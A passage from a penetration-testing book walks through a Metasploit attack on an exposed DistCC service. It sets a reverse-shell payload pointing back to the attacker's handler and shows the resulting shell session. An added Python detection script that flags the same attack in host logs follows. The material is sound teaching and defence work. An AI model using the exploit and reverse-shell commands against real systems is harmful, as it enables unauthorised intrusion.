Simulated Penetration Test

263

when performing the attack. (Remember that in a penetration test we can’t always rely on the defaults to be successful.)

Our scan finds that port 3632 is open and associated with DistCC. An online search tells us that DistCC is a program that distributes builds of C/C++ code to several machines across a network, and it is vulnerable to an attack. (When performing penetration tests, you will often encounter unfamiliar applications and products, and you will need to research the application before you can attack it.)

msf exploit(distcc_exec) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(distcc_exec) > set LHOST 172.16.32.129
LHOST => 172.16.32.129
msf exploit(distcc_exec) > set RHOST 172.16.32.162
RHOST => 172.16.32.162
msf exploit(distcc_exec) > show payloads

Compatible Payloads
===================

   Name                   Rank    Description
   ----                   ----    -----------
   cmd/unix/bind_perl     normal  Unix Command Shell, Bind TCP (via perl)
   cmd/unix/bind_ruby     normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/generic       normal  Unix Command, Generic command execution
   cmd/unix/reverse       normal  Unix Command Shell, Double reverse TCP (telnet)
   cmd/unix/reverse_perl  normal  Unix Command Shell, Reverse TCP (via perl)
   cmd/unix/reverse_ruby  normal  Unix Command Shell, Reverse TCP (via Ruby)

msf exploit(distcc_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(distcc_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo q6Td9oaTrOkXsBXS;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "q6Td9oaTrOkXsBXS\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (172.16.32.129:4444 -> 172.16.32.162:47002) at 2010-05-22 00:08:04 -0400

whoami
daemon
mkdir /root/moo
mkdir: cannot create directory '/root/moo': Permission denied
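From the defender's side, the session above leaves two footprints on the DistCC host: the build daemon (running as the unprivileged daemon account) spawns a shell instead of a compiler, and that shell opens an outbound TCP connection to the attacker's handler on port 4444 rather than to another build node on 3632. The following detection logic is an added example written for this edition of the page; it is not from the book or from the Metasploit project. The event format (simple key=value lines), the process names, and the sample events are all constructed for illustration and do not correspond to any particular logging product.

```python
"""Flag a DistCC host whose build daemon spawns a shell or dials out.

Added example (not from the book). The key=value event layout below is a
hypothetical format chosen for readability; adapt the parser to your own
process-audit and connection logs.
"""
import re

# Constructed sample events. Lines 2 and 3 model what the page's session
# would look like on the host: distccd launching sh, then sh connecting
# back to the handler at 172.16.32.129:4444. The other lines are normal
# build traffic (compiler children, a distcc client talking to a build
# node on the DistCC port 3632).
SAMPLE_EVENTS = """\
type=exec host=172.16.32.162 user=daemon parent=distccd child=cc1
type=exec host=172.16.32.162 user=daemon parent=distccd child=sh
type=connect host=172.16.32.162 user=daemon proc=sh dst=172.16.32.129 dport=4444
type=exec host=172.16.32.162 user=daemon parent=distccd child=ld
type=connect host=172.16.32.162 user=build proc=distcc dst=172.16.32.200 dport=3632
"""

# Children a distccd build job is expected to run (hypothetical allow-list;
# tune to the toolchain actually installed on the build host).
BUILD_TOOLS = {"cc1", "cc1plus", "gcc", "g++", "as", "ld", "collect2"}

DISTCC_PORT = "3632"
EVENT_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one 'k=v k=v ...' line into a dict."""
    return dict(EVENT_RE.findall(line))


def suspicious(ev):
    """Return an alert string for one event, or None if it looks benign."""
    if ev.get("type") == "exec" and ev.get("parent") == "distccd":
        # distccd should only ever fork compiler/linker stages.
        if ev.get("child") not in BUILD_TOOLS:
            return (f"distccd spawned non-compiler child {ev['child']} "
                    f"as {ev['user']} on {ev['host']}")
    if ev.get("type") == "connect" and ev.get("user") == "daemon":
        # The daemon account has no business opening connections except
        # DistCC's own port; anything else resembles a reverse shell.
        if ev.get("dport") != DISTCC_PORT:
            return (f"daemon-owned {ev['proc']} connected to "
                    f"{ev['dst']}:{ev['dport']} on {ev['host']}")
    return None


def analyze(text):
    """Run every non-empty event line through the rules; return the alerts."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        alert = suspicious(parse_event(line))
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print("ALERT:", a)
```

The two rules are deliberately narrow: a compiler allow-list for distccd's children, and a single permitted destination port for the service account. Either rule alone would have caught the session on the page, and together they survive the case where only one of the two log sources is collected.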